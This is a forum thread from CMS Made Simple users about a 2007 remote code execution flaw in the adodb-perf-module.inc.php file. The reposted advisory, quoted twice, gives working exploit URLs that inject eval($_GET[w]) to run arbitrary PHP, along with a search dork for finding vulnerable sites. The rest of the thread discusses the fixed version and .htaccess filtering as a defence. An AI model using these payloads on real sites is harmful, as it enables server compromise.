CMS Made Simple 1.2 Remote Code Execution Vulnerability

[johnbmcdonald]

I ran across this today..
I saw the version in the title...
it's probably old, and already taken care of, but I thought I'd post it here just in case.

John

http://securityreason.com/exploitalert/2811

  Topic : CMS Made Simple 1.2 Remote Code Execution Vulnerability
  ExploitAlert : 2811
  Credit : irk4z
  Date : 24.9.2007

  Download
  Exploit Code : 

# o [bug]
/"*._ _ #
# . . . .-*'`
`*-.._.-'/ #
# o o < * )) ,
( #
# . o
`*-._`._(__.--*"`.\ #
#
#
# vuln.: CMS Made Simple 1.1.2 Remote Code Execution
Vulnerability #
# author: irk4z@yahoo.pl
#
# download:
#
#
http://dev.cmsmadesimple.org/frs/downlo ... adesimple-
1.1.2.zip #
# dork: "powered by CMS Made Simple version 1.1.2"
#
# greetz: cOndemned, kacper, str0ke
#

# code:

/lib/adodb_lite/adodb-perf-module.inc.php:
...
eval('class perfmon_parent_EXTENDER extends ' . $last_module .
'_ADOConnection { }');
...

# exploit:

http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?la
st_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnec
tion{}//&w=phpinfo();
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?la
st_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnec
tion{}//&w=[ PHPCODE ]

[Pierre M.]

Hello John,

thank you for reporting this.

# exploit:

http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?la
st_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnec
tion{}//&w=phpinfo();
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?la
st_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnec
tion{}//&w=[ PHPCODE ]

Filter people, filter against []//(){} and such in the HTTP requests before they reach PHP whatever version of CMSms.

Pierre M.

[Signex]

I believe this is only with version 1.1.2 if I can read correct ?

this is from the link:
"CMS Made Simple 1.1.2 Remote Code Execution
Vulnerability" 

[johnbmcdonald]

I saw the 1.1.2 as well, but I went ahead and posted it because of the version in the title. I figured its better safe than sorry..

John

[calguy1000]

Those vulnerabilities were fixed in 1.1.4.1

[Pierre M.]

I like John's "better safe than sorry". It is unsafe to "not check" if the exploit has gone or not.

Moreover it is compatible with my "better filtered than not". Filter, people, filter

Of course, thanks to the dev team to have responded and fixed the issue.

Pierre M.

[xnau]

Well, I just had my site shut down by my host because of this same exploit. (apparently)

I'm here looking for a way to close the access--whatever it is. Certainly not my area of expertise. I'm running CMSMS 1.2 and according to my hosting company, the script that was exploited was adodb-perf-module.inc.php

I'm asking for more details from them so I can protect my site properly—and continue to use the submission form I had.

I see a suggestion here that input be filtered, but I'm not sure exactly where and how I would implement such a filter. Anyone care to share some suggestions on this?

thanks...

[xnau]

Well, I found what I needed...great thread on using the .htaccess file to keep things clean.

http://forum.cmsmadesimple.org/index.ph ... 45.15.html

thanks...

[kermit]

URL Filtering added to the wiki:

URL Filtering Using .htaccessi

[Pierre M.]

URL Filtering added to the wiki:

Well done kermit ! Thank you.

This is how the documentation improves. And security too.

Pierre